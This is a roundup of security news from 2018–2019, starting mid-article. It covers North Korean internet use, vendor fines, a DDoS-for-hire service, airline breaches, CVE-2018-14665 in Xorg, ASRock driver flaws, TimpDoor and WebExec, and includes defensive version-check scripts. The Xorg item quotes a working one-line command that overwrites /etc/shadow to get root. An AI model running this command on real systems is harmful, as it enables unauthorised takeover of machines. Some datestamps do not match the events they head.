A heuristic developed by Recorded Future to analyze internet traffic between North Korea and other countries has, in the past, enabled the firm to identify eight nations where North Koreans were physically located or living, including India, China, Nepal, Kenya, Mozambique, Indonesia, Thailand, and Bangladesh. Improvements to the heuristic have enabled the firm to gain deeper insight into data from China and India.

In China, this has discovered high volumes of activity involving the Beijing, Shanghai, and Shenyang regions, and also Nanchang, Wuhan, and Guangzhou. It also enables the firm to state with moderate confidence that seven Chinese universities have currently or previously hosted North Korean students, teachers or partners.

In India, Recorded Future detected high volumes of activity involving Delhi, Bangalore, Kolkata, and Hyderabad. It observed suspicious traffic involving the Indian Meteorological Department and National Remote Sensing Centre, but was unable to determine maliciousness.

The heuristic found an overlap with known North Korean illicit financing or logistics networks -- but not for Russia. Internet activity with Russia amounts to just 0.5% of that with China. Recorded Future turned to a report published in August by the non-profit organization C4ADS. This includes the comment, that as much as 80% of North Korea's overseas workforce is located in China and Russia. The implication is that far more North Koreans live and work in Russia than is suggested by the comparison of internet traffic between the two countries.

The C4ADS report also notes, "some estimates suggest that North Korean laborers may generate as much as $1.2 to $2.3 billion USD per year for the Kim regime, which -- if true -- would be equivalent to as much as 93% of North Korea's total exports in 2016." It adds that most worksites exhibit features characteristic of forced labor. The laborers work 12- to 16-hour days and hand over between 70% and 90% to handlers to be sent back to North Korea.

Recorded Future suggests that the difference in North Korea/Russia and North Korea/China internet traffic is that the former work as laborers with no internet requirement, while the latter work in the information economy, building mobile games, apps, bots, and other IT products for a global customer base. "This type of information economy work," writes Recorded Future, "creates a different internet fingerprint than exploitative manual labor and likely clarifies the discrepancy between physical presence and internet activity."

Recorded Future concludes that its research "has demonstrated how adaptable and innovative North Korea's most senior leadership are. They are quick to embrace new services or technologies when useful and cast them aside when not. The Kim regime has developed a model for using and exploiting the internet that is unique -- it is a nation run like a criminal syndicate."

Apple and Samsung fined millions for “planned obsolescence” of old smartphones
28.10.2019 securityweek

The Italian Competition Authority AGCM has fined Apple and Samsung 5 million Euros and 10 million Euros for “planned obsolescence” of their mobile devices.
After a long investigation conducted by the Italian Competition Authority AGCM, the agency has fined Apple and Samsung 5 million Euros ($5.8 million) and 10 million Euros ($11.5 million) for “planned obsolescence” of their mobile devices.

According to the Authority, the two tech giants provided software updates to devices that were not able to support them, without providing accurate and correct information and without allowing any subsequent uninstallation.
Both companies are accused of having slowed down their older devices with the intent of encouraging users to purchase new ones.

In particular, Samsung was challenged over the update issued in May 2016 for the Galaxy Note 4, while for Apple the AGCM questioned the update issued in September 2016 for the several devices supported at the time (i.e. iPhone 6 and 6s); Apple failed to provide consumers with correct information about the effects of the updates, which had a significant impact on performance and battery life.

“As a result of two complex investigations, the Italian Competition Authority – AGCM has ascertained that companies of Samsung group and Apple group have carried out unfair commercial practices in violation of Articles 20, 21, 22 and 24 of the Consumer Code in relation to the release of some firmware updates for their mobile phones which caused serious malfunctions and significantly reduced their performance, in this way speeding up their replacement with more recent products.” AGCM said in a statement.

“The two companies have induced consumers – by insistently proposing to proceed with the download and also because of the significant information asymmetry of consumers vis-a-vis the producers – to install software updates that are not adequately supported by their devices, without adequately informing them, nor providing them an effective way to recover the full functionality of their devices.”

Back in December 2017, Apple apologized for slowing down older iPhones; the company had introduced features that affected the iPhone 6, 6S, 7 and SE to cope with aging batteries.

On the other hand, in January Samsung announced that it “does not provide the software updates to reduce the product performance over the life cycle of the device.”

A few dollars to bring down sites with new Bushido-based DDoS-for-hire service
28.10.2019 securityaffairs

Security researchers at FortiGuard Labs have discovered a new DDoS-for-hire service called “0x-booter”, built from leaked code and offering an easy-to-use interface.
“0x-booter” first appeared on October 17, 2018; a post published on Facebook advertises over 500 Gbps of attack capacity and 20,000 bots.

“During our regular monitoring, the FortiGuard Labs team recently discovered a new platform offering DDoS-for-hire service called ‘0x-booter.’” reads the analysis published by Fortinet.

“First appearing on October 17, 2018, 0x-booter is available to anyone who signs up on the website. As shown in the following figures, this service comes with an explicitly defined user interface which enables practically anyone to learn and use the service.”

The DDoS-for-hire service is powered by the Bushido IoT botnet, although experts at Fortinet believe the service has lower capabilities and fewer bots than advertised. At the time of the analysis, the 0x-booter service was able to carry out 424.825 Gbps attacks leveraging 16,993 bots.

Still, this firepower is enough to cause severe problems for targeted websites.


The DDoS-for-hire service allows users to power different attacks, primarily at the Transport and Application layers.

The prices for 0x-booter service range from $20 to $150, depending on various parameters, including the number of attacks, the duration of an attack, and customer support offered by the operators.

Researchers were able to uncover the following JSON files that provided information on the service:

typeattack.php – this file contains a list of every available DDoS method with its corresponding value of conducted attacks
dateattack.php – this file contains a list of dates with the corresponding number of all attack methods conducted per day
According to the content of the second file, the service was used to power more than 300 attacks since Oct 14th.

The Bushido botnet is run by a group called ZullSec; it was first spotted by the security researchers at MalwareMustDie, the same group that discovered the dreaded Mirai botnet.

The botnet is a modification of the Mirai bot, but Bushido was improved to launch DDoS attacks with more options.
“After analysing both the website and the botnet, we discovered that the codes used have been copy-pasted from an open source and modified for their own purposes.” continues the analysis.

“In fact, the 0x-booter website was based on another booter/ stresser called Ninjaboot, the source code of which was leaked in hacking forums last year. Even though the Bushido botnet has its own name, it still borrows a lot of its code from Mirai and is still considered a fork of Mirai.”

Experts pointed out that would-be crooks with just a few clicks, a few dollars, and a little knowledge about botnets can power severe attacks and cause great damage.
Technical details about the service are included in the analysis published by Fortinet.

Apple CEO Backs Privacy Laws, Warns Data Being 'Weaponized'
27.10.2019 securityweek

The head of Apple on Wednesday endorsed tough privacy laws for both Europe and the U.S. and renewed the technology giant's commitment to protecting personal data, which he warned was being "weaponized" against users.

Speaking at an international conference on data privacy, Apple CEO Tim Cook applauded European Union authorities for bringing in a strict new data privacy law in May and said the iPhone maker supports a U.S. federal privacy law.

Cook's speech, along with video comments from Google and Facebook top bosses, in the European Union's home base in Brussels, underscores how the U.S. tech giants are jostling to curry favor in the region as regulators tighten their scrutiny.

Data protection has become a major political issue worldwide, and European regulators have led the charge in setting new rules for the big internet companies. The EU's new General Data Protection Regulation, or GDPR, requires companies to change the way they do business in the region, and a number of headline-grabbing data breaches have raised public awareness of the issue.

"In many jurisdictions, regulators are asking tough questions. It is time for the rest of the world, including my home country, to follow your lead," Cook said.

"We at Apple are in full support of a comprehensive federal privacy law in the United States," he said, to applause from hundreds of privacy officials from more than 70 countries.

In the U.S., California is moving to put in regulations similar to the EU's strict rules by 2020 and other states are mulling more aggressive laws. That's rattled the big tech companies, which are pushing for a federal law that would treat them more leniently.

Cook warned that technology's promise to drive breakthroughs that benefit humanity is at risk of being overshadowed by the harm it can cause by deepening division and spreading false information. He said the trade in personal information "has exploded into a data industrial complex."

"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency," he said. Scraps of personal data are collected for digital profiles that let businesses know users better than they know themselves and allow companies to offer users "increasingly extreme content" that hardens their convictions, Cook said.

"This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them," he said. "This should make us very uncomfortable. It should unsettle us."

Cook's appearance was a chance to one-up his tech rivals and show off his company's credentials in data privacy, which has become a weak point for both Facebook and Google. That is helped by the fact that Apple makes most of its money by selling hardware like iPhones rather than ads based on user data.

"With the spotlight shining as directly as it is, Apple have the opportunity to show that they are the leading player and they are taking up the mantle," said Ben Robson, a lawyer at Oury Clark specializing in data privacy. Cook's appearance "is going to have good currency," with officials, he added.

His speech comes a week after Apple unveiled expanded privacy protection measures for people in the U.S., Canada, Australia and New Zealand, including allowing them to download all personal data held by Apple. European users already had access to this feature after GDPR took effect. Apple plans to expand it worldwide.

Facebook CEO Mark Zuckerberg and Google head Sundar Pichai sent brief video remarks to the annual meeting of global data privacy chiefs.

Zuckerberg said the social network takes seriously its "basic ethical responsibility" to safeguard personal information but added that "the past year has shown we have a lot more work to do," referring to a big data breach and the scandal over the misuse of data by political consultancy Cambridge Analytica.

He also said the company is investing in measures to beef up protection, including building a new tool to let users clear their browsing activity and deploying artificial intelligence to detect fake accounts and take down extremist content.

They both said they supported regulation, with Pichai noting Google recently proposed a legislative framework that would build on GDPR and extend many of its principles to users globally.

The International Conference of Data Protection and Privacy Commissioners, held in a different city every year, normally attracts little attention but its Brussels venue this year takes on symbolic meaning as EU officials ratchet up their tech regulation.

The 28-nation EU took on global leadership of the issue when it launched GDPR. The new rules require companies to justify the collection and use of personal data gleaned from phones, apps and visited websites. They must also give EU users the ability to access and delete data, and to object to data use.

GDPR also allows for big fines benchmarked to revenue, which for big tech companies could amount to billions of dollars.

In the first big test of the new rules, Ireland's data protection commission, which is a lead authority for Europe as many big tech firms are based in the country, is investigating Facebook's data breach, which let hackers access 3 million EU accounts.

Google, meanwhile, shut down its Plus social network this month after revealing it had a flaw that could have exposed personal information of up to half a million people.

SOC-as-a-Service Firm Arctic Wolf Networks Raises $45 Million
27.10.2019 securityweek

Arctic Wolf Networks, a Sunnyvale, Calif.-based company that offers outsourced security operations center (SOC) services, announced this week that it has raised $45 million in series C funding led by Future Fund. The company has raised a total of $91.2 million to-date.

The company offers a turnkey “SOC-as-a-Service” that includes what the company calls a “Concierge Security Engineer” (CSE) that serves as a single point of contact for a customer and an extension of a customer’s internal security team.

Founded in 2012, Arctic Wolf eliminates the need to build a SOC and also helps companies combat the cyber-security skills shortage. The company provides customers with 24×7 monitoring, tailored alerts, and incident investigation and response.

With no hardware or software purchase needed, Arctic Wolf’s end-to-end service installs in minutes to immediately provide threat detection.

The new funding round saw participation from Adams Street and Unusual Ventures, which joined existing investors, Lightspeed Venture Partners, Redpoint Ventures, Sonae Investment Management and Knollwood Investment Advisory LLC.

The company plans on using the new funding to accelerate growth and meet demand for its SOC-as-a-service offering.

The company more than doubled its workforce over the past year, and currently employs 166 people across four North American offices.

“Our growing team of security engineers is redefining the economics of security to protect companies of all sizes. In addition to supporting continued company growth, the funding will accelerate expansion of our service offering, as we continue to scale and expand to meet our customers’ individualized needs,” Brian NeSmith, CEO and co-founder of Arctic Wolf, said.

British Airways: additional 185,000 passengers may have been affected
27.10.2019 securityaffairs

The data breach suffered by the British Airways airline is worse than initially thought: according to IAG, the firm that owns the airline, a further 185,000 customers may have been impacted in the incident.

An investigation conducted by researchers at RiskIQ revealed that the attack was carried out by a crime gang tracked as MageCart.

Hackers accessed personal and financial data of an additional 77,000 payment card holders, including name, billing address, email address and card payment information.

The personal details of an additional 108,000 customers, without card verification value, have also been compromised.

“While we do not have conclusive evidence that the data was removed from British Airways’ systems, we are taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution. Customers who are not contacted by British Airways by Friday 26 October at 1700 GMT do not need to take any action.” reads the statement published by British Airways.

“In addition, from the investigation we know that fewer of the customers we originally announced were impacted. Of the 380,000 payment card details announced, 244,000 were affected. Crucially, we have had no verified cases of fraud.”

IAG confirmed that the company has been “working continuously with specialist cyber forensic investigators and the National Crime Agency to investigate fully the data theft.”

The spokesperson for British Airways said that the company has contacted all affected customers via email before 5 pm on Friday, and plans to compensate affected customers.

At the time of writing, British Airways declared there had been no verified cases of fraud since it disclosed the security breach.

CVE-2018-14665 privilege escalation flaw affects popular Linux distros
27.10.2019 securityaffairs

A security researcher discovered a highly critical vulnerability (CVE-2018-14665) in the X.Org Server package that affects major Linux distributions.
The Indian security researcher Narendra Shinde has discovered a highly critical vulnerability (CVE-2018-14665) in X.Org Server package that affects major Linux distributions, including OpenBSD, Debian, Ubuntu, CentOS, Red Hat, and Fedora.

The Xorg X project provides an open source implementation of the X Window System (aka X11, or simply X), a windowing system for bitmap displays. It provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.

Shinde discovered that Xorg X server doesn’t correctly handle and validate arguments for at least the following two command-line parameters:

-modulepath: to set a directory path to search for Xorg server modules,
-logfile: to set a new log file for the Xorg server, instead of using the default log located at /var/log/Xorg.n.log on most platforms.
According to Narendra Shinde, a low-privileged user could exploit it to execute malicious code and overwrite any file on the system.

“X.org X Server application is vulnerable to privilege escalation issue. X.org X Server application allows lower privileged user to create or overwrite file anywhere on system , including files owned by privileged users (ex. /etc/shadow).” reads the advisory published by the expert.

“The attacker needs to have active console session to exploit this issue.”

The flaw was introduced in X.Org server 1.19.0 package more than two years ago.

Xorg published a security advisory on the CVE-2018-14665 flaw.

“When the X server is running with elevated privileges (i.e., when Xorg is installed with the setuid bit set and started by a non-root user).” reads the Xorg advisory.

“The -modulepath argument can be used to specify an insecure path to modules that are going to be loaded in the X server, allowing to execute unprivileged code in the privileged process.

The -logfile argument can be used to overwrite arbitrary files in the file system, due to incorrect checks in the parsing of the option.”
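For a defender triaging this advisory, three questions matter: is the installed server in the affected range (1.19.0 up to, but not including, 1.20.3), is it installed setuid root (the precondition the advisory names), and are there Xorg invocations whose -logfile or -modulepath point somewhere unusual? The following is an added example written for this article, not X.Org's or any distribution's own tooling. It assumes that `Xorg -version` prints a line of the form "X.Org X Server 1.19.6", and the binary path and the log and module directory prefixes are this example's assumptions to adjust per distribution; the audit-log lines at the bottom are constructed.

```python
import os
import re
import shlex
import stat
import subprocess

# Version boundaries taken from the write-up: introduced in 1.19.0, fixed in 1.20.3.
FIRST_AFFECTED = (1, 19, 0)
FIXED_VERSION = (1, 20, 3)

# Assumed locations (adjust for your distribution): the default log directory
# and the usual module directories.
LOG_PREFIX = "/var/log/"
MODULE_PREFIXES = ("/usr/lib/xorg/modules", "/usr/lib64/xorg/modules", "/usr/local/lib/xorg/modules")

VERSION_RE = re.compile(r"X\.Org X Server (\d+)\.(\d+)\.(\d+)")


def parse_xorg_version(output: str):
    """Parse the 'X.Org X Server 1.19.6' line printed by `Xorg -version` (assumed format)."""
    match = VERSION_RE.search(output)
    if not match:
        return None
    return tuple(int(part) for part in match.groups())


def version_is_affected(version) -> bool:
    """True for 1.19.0 <= version < 1.20.3, the range described in the write-up."""
    return version is not None and FIRST_AFFECTED <= version < FIXED_VERSION


def is_setuid_root(path: str) -> bool:
    """The advisory's precondition: Xorg installed setuid root (and started by a non-root user)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


def audit_cmdline(cmdline: str) -> list:
    """Heuristic for process-start logs: flag -logfile / -modulepath values outside
    their usual places. -modulepath may be a comma-separated list."""
    argv = shlex.split(cmdline)
    findings = []
    for option, value in zip(argv, argv[1:]):
        if option == "-logfile" and not value.startswith(LOG_PREFIX):
            findings.append(f"-logfile outside {LOG_PREFIX}: {value}")
        if option == "-modulepath":
            for entry in value.split(","):
                if not any(entry.startswith(prefix) for prefix in MODULE_PREFIXES):
                    findings.append(f"-modulepath outside the expected module directories: {entry}")
    return findings


def check_host(xorg_path: str = "/usr/lib/xorg/Xorg") -> dict:
    """Combine the checks for the local machine. Only reads file metadata and the
    version banner; the default path is an assumption (Debian-style layout)."""
    report = {"path": xorg_path, "setuid_root": is_setuid_root(xorg_path), "version": None, "affected": False}
    try:
        proc = subprocess.run([xorg_path, "-version"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return report  # binary missing or not runnable; report what we have
    report["version"] = parse_xorg_version(proc.stdout + proc.stderr)
    # Both conditions from the advisory must hold for the host to be exposed.
    report["affected"] = report["setuid_root"] and version_is_affected(report["version"])
    return report


if __name__ == "__main__":
    print(check_host())
    # Constructed lines as they might appear in a process-start audit log.
    for line in ("Xorg -logfile /var/log/Xorg.1.log :1",
                 "Xorg -logfile /tmp/x.log -modulepath /tmp/mods,/usr/lib/xorg/modules :1"):
        print(line, "->", audit_cmdline(line) or "ok")
```

The version test alone is not enough: an unprivileged Xorg (for example one started by a display manager as root, or a distribution without the setuid bit) is not exposed by this issue, which is why check_host only reports "affected" when both conditions hold. The cmdline audit is a cheap signal for auditd or EDR process-creation events and will also surface misconfigurations that have nothing to do with this CVE.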

The security expert Matthew Hickey also published a proof-of-concept exploit code that could allow an attacker to take over vulnerable systems with 3 commands or less.

Hacker Fantastic
OpenBSD #0day Xorg LPE via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less. exploit https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh … 🙄

11:14 PM - Oct 25, 2018

Hacker Fantastic
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.

7:53 PM - Oct 25, 2018
The X.Org foundation addressed the vulnerability with the release of the X.Org Server version 1.20.3.

Major distros, including OpenBSD, Debian, Ubuntu, CentOS, Red Hat, and Fedora have published security advisories for the CVE-2018-14665 flaw.

Multiple Vulnerabilities Patched in ASRock Drivers

27.10.2019 securityweek Vulnerability

SecureAuth Labs security researchers have discovered multiple vulnerabilities in low-level drivers installed by ASRock utilities.

Established in 2002, ASRock is the third largest motherboard brand globally. Headquartered in Taipei, Taiwan, the company has branches in Europe and the United States. The maker offers a series of utilities that provide users control over certain settings and functions.

SecureAuth discovered a series of security flaws in AsrDrv101.sys and AsrDrv102.sys low-level drivers that the ASRock RGBLED and other ASRock branded utilities install. By exploiting these vulnerabilities, a local attacker can elevate privileges on the system.

The vulnerabilities were found in ASRock RGBLED, A-Tuning, F-Stream, and RestartToUEFI. The vendor has already released patched versions of each application: ASRock RGBLED v1.0.36, A-Tuning v3.0.216, F-Stream v3.0.216, and RestartToUEFI v1.0.7.

The low-level drivers are used to program and query the status on embedded integrated circuits. Thus, the applications can access fan performance curves, clock frequencies, LED colors, thermal performance, and other user-customizable properties and monitoring functionality.

One of the main issues discovered by the researchers was that these drivers would expose functionality to read and write control register (CR) values. The flaw, tracked as CVE-2018-10709, could be abused to run code with elevated privileges.

Another issue the researchers discovered was related to input/output control code in the driver, which exposed functionality to read and write arbitrary physical memory, also leading to privilege escalation (CVE-2018-10710).

The driver also exposes functionality to read and write Machine Specific Registers (MSRs), which an attacker could leverage to execute arbitrary ring-0 code (CVE-2018-10711), SecureAuth reveals.

Functionality to read/write data from/to IO ports was also exposed, allowing an attacker to run code with elevated privileges (CVE-2018-10712).

The security researchers reported the findings to ASRock in March, and the company was able to resolve the issues within a month. According to SecureAuth, the new driver architecture was rolled out to ASRock utilities only in August.

'TimpDoor' Malware Turns Android Devices into Proxies

27.10.2019 securityweek Android

A newly discovered piece of Android malware creates a Socks proxy on infected devices, potentially allowing access to internal networks, McAfee reports.

Dubbed TimpDoor, the threat is distributed through phishing text messages that attempt to trick users into installing a fake voice message app. As soon as the app is installed, however, a background service starts a Socks proxy to “redirect all network traffic from a third-party server via an encrypted connection through a secure shell tunnel.”

Not only do infected devices serve as backdoors, but the attackers could also abuse a network of compromised devices to send spam and phishing emails, perform ad click fraud, or launch distributed denial-of-service (DDoS) attacks, McAfee’s security researchers say.

The earliest malware variant was available in March, while the latest at the end of August, the researchers believe. The malware apparently infected at least 5,000 devices in a campaign targeting users in the United States since at least the end of March.

The phishing SMS messages inform the user they have two voice messages they need to review and also present them with a URL to follow. If the user clicks on the link, a fake web page is displayed, asking them to install an application to listen to the voice messages.

After installation, the fake app offers to render the voice messages, but hides its icon from the home screen as soon as the user completes this operation. In the background, however, a service is started without the user’s knowledge.

Next, the malware gathers a broad range of information, such as device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. Afterwards, it starts a secure shell (SSH) connection to the control server and sends the device ID to receive an assigned remote port it would later use for remote port forwarding, and also ensures that the SSH connection is kept alive.

At the same IP address that hosted the fake voice application, the researchers found more APK files, which revealed that earlier versions of the malware used an HTTP proxy (LittleProxy), while newer ones switched to a Socks proxy (MicroSocks). The package name and control server URLs also changed.

TimpDoor, however, is not the first Android malware to turn devices into mobile proxies. MilkyDoor, an apparent successor of DressCode, was discovered last year with similar capabilities. While DressCode only installs a Socks proxy on the infected device, MilkyDoor also uses port forwarding via SSH, the same as TimpDoor.

However, there are numerous differences between TimpDoor and MilkyDoor, ranging from distribution (SMS phishing versus Google Play), to the SSH connection and proxy functionality. The older threat appears to be a more complete SDK, while the newer malware only has basic proxy functionality.

“TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them shows that this threat is probably still under development,” McAfee concludes.

Researchers Find Command Injection Flaw in Cisco WebEx
27.10.2019 securityweek

Cisco’s WebEx software is affected by a serious vulnerability that can be exploited to execute arbitrary commands with elevated privileges.

The security hole was discovered by Ron Bowes and Jeff McJunkin of Counter Hack. The researchers dubbed the flaw WebExec and even set up a dedicated website for it at webexec.org.

The vulnerability, tracked as CVE-2018-15442, was reported to Cisco in early August and patches were released within two months. Cisco coordinated the disclosure of the flaw with the researchers and there is no evidence that it has been exploited for malicious purposes.

According to Cisco, the WebExec vulnerability affects Webex Meetings Desktop App prior to 33.6.0, and Webex Productivity Tools releases 32.6.0 and later, prior to 33.0.5.

Cisco says the flaw can be exploited by an authenticated, local attacker to execute arbitrary commands with SYSTEM privileges. However, the networking giant noted that remote exploitation may also be possible in Active Directory deployments through the operating system’s remote management tools.

“This is a pretty unique vulnerability, because it's a remote vulnerability in a client application that doesn't even listen on a port,” Bowes and McJunkin wrote. “The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Windows' remote service interface (except on Windows 10, which requires an administrator login).”

The researchers have made available proof-of-concept (PoC) code for both Nmap and Metasploit, along with a tool that allows users to check if their systems are vulnerable. Technical details on the vulnerability have also been released.
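
To turn the affected-version ranges quoted above into a repeatable inventory check, here is an added Python example; it is not Cisco's advisory tooling or the researchers' checker. It assumes an inventory of (host, product, version) triples gathered elsewhere; the product keys, host names and installed versions in the sample are constructed for the example.

```python
"""Flag hosts whose Cisco Webex build falls in the ranges affected by CVE-2018-15442 (WebExec).

Added example, not Cisco's advisory tooling or the researchers' checker.
The two ranges below are the ones quoted in the article; the product keys,
host names and versions in the sample inventory are constructed.
"""
from typing import Iterable, List, Tuple

# Affected ranges as stated by Cisco: [low, high) with None meaning "no lower bound".
#   Webex Meetings Desktop App: releases prior to 33.6.0
#   Webex Productivity Tools:   32.6.0 and later, prior to 33.0.5
AFFECTED_RANGES = {
    "meetings_desktop_app": [(None, "33.6.0")],
    "productivity_tools": [("32.6.0", "33.0.5")],
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Convert '33.10.1' to (33, 10, 1) so comparisons are numeric.

    Comparing the raw strings would be wrong: '33.10.1' < '33.6.0' lexically.
    Trailing zero components are dropped so '33.6' and '33.6.0' compare equal.
    """
    parts = [int(p) for p in version.strip().split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_affected(product: str, version: str) -> bool:
    """True if `version` of `product` falls inside a published affected range."""
    v = parse_version(version)
    for low, high in AFFECTED_RANGES[product]:
        above_low = low is None or v >= parse_version(low)
        below_high = v < parse_version(high)
        if above_low and below_high:
            return True
    return False


def triage(inventory: Iterable[Tuple[str, str, str]]) -> List[str]:
    """Return the sorted host names that still need the patched build."""
    return sorted(host for host, product, version in inventory
                  if is_affected(product, version))


# Constructed sample inventory: (host, product, installed version).
SAMPLE_INVENTORY = [
    ("ws-001", "meetings_desktop_app", "33.5.2"),    # below 33.6.0 -> affected
    ("ws-002", "meetings_desktop_app", "33.6.0"),    # first fixed build
    ("ws-003", "meetings_desktop_app", "33.10.1"),   # a lexical compare would misjudge this
    ("ws-004", "productivity_tools", "32.5.9"),      # below the 32.6.0 lower bound
    ("ws-005", "productivity_tools", "32.6.0"),      # inside [32.6.0, 33.0.5)
    ("ws-006", "productivity_tools", "33.0.5"),      # first fixed build
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: affected by CVE-2018-15442, update Webex")
```

The numeric tuple comparison is the part worth copying: a string comparison would rank 33.10.1 as older than 33.6.0 and wrongly queue a patched host for remediation.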

Questions Mount Over Delay After Cathay Pacific Admits Huge Data Leak
27.10.2019 securityweek

Hong Kong carrier Cathay Pacific came under pressure Thursday to explain why it had taken five months to admit it had been hacked and compromised the data of 9.4 million customers, including passport numbers and credit card details.

The airline said Wednesday it had discovered suspicious activity on its network in March and confirmed unauthorised access to certain personal data in early May.

However, chief customer and commercial officer Paul Loo said officials wanted to have an accurate grasp on the situation before making an announcement and did not wish to "create unnecessary panic".

News of the leak sent shares in Cathay, which was already under pressure as it struggles for customers, plunging more than six percent to a nine-year low in Hong Kong trading.

Local politicians slammed the carrier, saying its response had only fuelled worries.

"Whether the panic is necessary or not is not for them to decide, it is for the victim to decide. This is not a good explanation at all to justify the delay," said IT sector lawmaker Charles Mok.

And legislator Elizabeth Quat said the delay was "unacceptable" as it meant customers missed five months of opportunities to take steps to safeguard their personal data.

The airline admitted about 860,000 passport numbers, 245,000 Hong Kong identity card numbers, 403 expired credit card numbers and 27 credit card numbers with no card verification value (CVV) were accessed.

Other compromised passenger data included nationalities, dates of births, phone numbers, emails, and physical addresses.

- Probe launched -

"We have no evidence that any personal data has been misused. No-one's travel or loyalty profile was accessed in full, and no passwords were compromised," chief executive Rupert Hogg said in a statement Wednesday.

But Mok said the public needs to know how the company can prove that was the case.

"Such a statement doesn't give people absolute confidence that we are completely safe, and it doesn't mean that some of this data would not be misused later," Mok told AFP.

He also pointed out that the European Union’s new General Data Protection Regulation says any such breach should be reported within 72 hours.

Hong Kong's privacy commissioner Stephen Wong expressed "serious concern" over the breach in a statement Thursday and said the office would initiate a compliance check with the airline.

"Organisations in general that amass and derive benefits from personal data should ditch the mindset of conducting their operations to meet the minimum regulatory requirements only," Wong said.

"They should instead be held to a higher ethical standard that meets the stakeholders' expectations alongside the requirements of laws and regulations," he added.

Cathay said it had launched an investigation and alerted the police after an ongoing IT operation revealed unauthorised access of systems containing the passenger data.

The company is in the process of contacting affected passengers and providing them with solutions to protect themselves.

- Struggling business -

Cathay Pacific is already battling to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.

It booked its first back-to-back annual loss in its seven-decade history in March, and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.

Shares of the carrier plunged 3.77 percent on Thursday.

The troubled airline did not mention financial compensation for passengers affected by the data leak, but British Airways pledged to compensate customers when the UK flag carrier suffered a data hack last month.

BA revealed in September that personal and financial details of about 380,000 customers who booked flights on the group's website and mobile phone app over several weeks had been stolen.

The leak is the latest to hit global companies in recent years.

Facebook revealed last month that up to 50 million accounts were breached by hackers, while ride-sharing giant Uber was vilified after a breach in 2016 of data on 57 million of its riders and drivers was revealed only in November 2017.

In April, the holding company of Yahoo was fined $35 million by US regulators because it had not informed them until this year that hackers had stolen "crown jewel" data including email addresses and passwords.

And in the US, credit bureau Equifax identified that almost 150 million American consumers' personal details had been exposed by a massive data breach that sparked a public outcry and a congressional probe.

In 2011 Sony suffered a massive breach that compromised more than 100 million accounts and forced it to temporarily halt its PlayStation Network and Qriocity services.

UK Regulator Hits Facebook With Maximum Fine
27.10.2019 securityweek

ICO Fines Facebook Maximum £500,000 Over its Role in the Cambridge Analytica Scandal

Back in April, SecurityWeek asked the question, 'would Facebook be in breach of GDPR over the Cambridge Analytica scandal?' The question has been answered unequivocally: Yes.

This confirms the advice we were given at the time. "From Facebook's perspective," MacRoberts LLP senior partner David Flint said, "the only good point is that the maximum fine under the [current UK] Data Protection Act is £500,000; after 25 May 2018 it would be 4% of Facebook worldwide turnover ($40bn in 2017) -- a potential $1.6bn fine! That's before damages claims."

Today the UK's data protection regulator, Information Commissioner Elizabeth Denham, announced that Facebook (defined as Facebook Ireland Ltd, and Facebook Inc -- the Facebook Companies) has indeed been fined £500,000. "The ICO's investigation," explains the regulator, "found that between 2007 and 2014, Facebook processed the personal information of users unfairly by allowing application developers access to their information without sufficiently clear and informed consent, and allowing access even if users had not downloaded the app, but were simply ‘friends' with people who had."

The specific app in question was developed by Dr Aleksandr Kogan and his company GSR. It harvested data of up to 87 million people worldwide. A large portion of this data was shared with the SCL group -- the parent company of political campaign organization Cambridge Analytica. The ICO's investigation found that "the personal information of at least one million UK users was among the harvested data and consequently put at risk of further misuse."

During the process of the investigation, Facebook argued that the ICO had no jurisdiction in the matter -- although it did cooperate with the ICO. The ICO's Decision Notice (PDF) explains its position:

"UK Users would include (but would not be confined to) UK residents who made use of the Facebook site during the material time. UK Users would also include persons visiting the UK who made use of the Facebook site during the material time while visiting the UK. Because the processing by the Facebook Companies of personal data about the UK Users took place in the context of a UK establishment: (i) such processing fell within the scope of the DPA ; and (ii) the Commissioner has jurisdiction over the Facebook Companies in respect of such processing."

While Facebook has asserted that only personal data from U.S. citizens was used (misused under European principles) for Cambridge Analytica's political campaigning, the ICO comments, "Some US residents would also, from time to time, have been UK users (as defined above): e.g. if they used the Facebook site while visiting the UK."

The same principle of 'user' rather than citizen applies to GDPR. It reinforces a key point often missed by U.S. organizations: GDPR is not merely about protecting the PII of EU citizens, it applies to any person of any nationality who is within the geographical boundaries of the EU at the time.

Part of the reason for the ICO to apply the maximum fine possible under the legislation applicable at the time (the UK's Data Protection Act 1998, now superseded by the Data Protection Act 2018, being the UK's implementation of GDPR) was the persistence of Facebook's failing.

"Even after the misuse of the data was discovered in December 2015," says the ICO, "Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. In the case of SCL Group, Facebook did not suspend the company from its platform until 2018."

This is another key aspect of GDPR -- regulators will take into consideration efforts made to protect personal data. While rapid remedial action is unlikely to reduce any applicable fine, failure to act promptly and effectively will almost certainly increase it.

"Facebook failed to sufficiently protect the privacy of its users before, during and after the unlawful processing of this data. A company of its size and expertise should have known better and it should have done better," said Elizabeth Denham.

